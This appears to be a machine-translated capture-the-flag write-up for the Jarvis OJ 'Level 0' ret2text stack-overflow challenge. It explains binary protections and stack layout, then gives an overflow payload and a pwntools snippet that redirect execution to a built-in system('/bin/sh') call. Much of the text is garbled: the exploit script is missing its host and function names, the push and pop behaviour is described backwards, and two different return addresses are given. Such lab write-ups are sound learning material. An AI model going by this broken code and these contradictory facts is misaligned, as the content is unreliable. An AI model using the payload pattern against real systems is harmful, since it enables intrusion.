Title source: Jarvis OJ
Title: Level 0
Title Description:
belongs to the stack overflow in the ret2text meaning Return to text when the program has a dangerous function that can be exploited to control the return address of the program to the original function to achieve the overflow to take advantage of the
Basic process (depends on personal habits):
Running the program Viewing the program flow
file View file memory type
checksec View file protection mechanisms
ida decompiler
Analyze suspected vulnerability points Determine attack ideas Write pocs
View the flow of the program
The construction of memory is different for different systems. The register operations related to the stack are mainly the EBP and ESP registers, compared to a pointer, the ESP register always points to the top of the stack, when executing the PUSH command to press data into the stack, the ESP is minus 4, and then the data is copied to the location pointed to by the ESP, and when executing the POP command, the data pointed to by the ESP is first copied into the memory/registers, then ESP+4, and the stack expands from high to low addresses in memory, so parameters or local variables are always accessed by EBP plus or minus a certain offset address.
32 bits 4 offsets
64-bit 8 offset
For stack overflow vulnerabilities, it is usually necessary to determine the fill length, calculate the distance between the address to be operated on and the address to be overwritten, and the location of the stack base and top of the stack, which is obtained through the offset calculation described above, to overwrite the contents of a specific variable or address according to the reality of the situation.
I know it's a 64-bit file.
View document protection mechanisms
NX Stack Disable Execution
PIE location-independent executables
Canary Stack Overflow Sentry
Symbol
RELRO (got write protection) global offset table dynamic parsing function Address randomization
Only open a NX, not open Stack Canary, this function in the function before the execution of the function call location to insert cookie markers, when the function returns to the call to verify that the cookie information is legitimate, not legitimate to stop the program running, but if the overflow in the, but also covered the cookie, it will be bypassed.PIE means address-independent executable file. Each time the program is loaded, the base address of the text, data, bss and other segments are changed, making it difficult for the attacker to locate the corresponding base address to execute the overflow.
Throwing it into ida and looking at it, and disassembling it directly into the min function, it prints the helloword and then returns a function.
Check this function rbp-80h // the string is 0x80h away from ebp
ebp
Base Address Pointer Register Points to the bottom of the topmost stack frame of the system stack (stack addressing)
The main purpose is to save the recovery stack so that you can pass parameters to the function.
The read function does no filtering and will read the contents until the carriage return.
The file is 64-bit and the distance from ebp is 0x80 and the distance from esp is 0x8b.
8byte in the case of 64-bit
pop ebp;out stack stack expanded by 4 byte
push ebp;out of the stack, the stack is reduced by 4byte
Then the corresponding stack structure is (diagram stolen from the internet)
I found a callsystem built-in system function system('/bin/sh') that executes system commands.
address 0x400684 plus this address is overwritten with the address we want to return to read
payload = 'a'*0x80 + 'b'*8 + p64(0x400596)
The stack structure at this point is
In sending this string to the program, each value in the computer's memory is stored in bytes, usually on the little end.
What is small end storage:
In Little-Ended Storage Mode The least significant byte of data is stored at the lowest address of the data and vice versa for the highest significant byte.
Both 0x0804843B in memory in the form of \x3b\x84\x04\x08
Use pwntools to pass in bytes as characters, that is, to convert strings to binary.
from pwn import * import pwn r = ('', 9881) # buf rbp callsystem payload = 'a'*0x80 + 'b'*8 + p64(0x400596) (payload) ()
The above is a purely white learning process If there are any mistakes, please don't hesitate to tell me.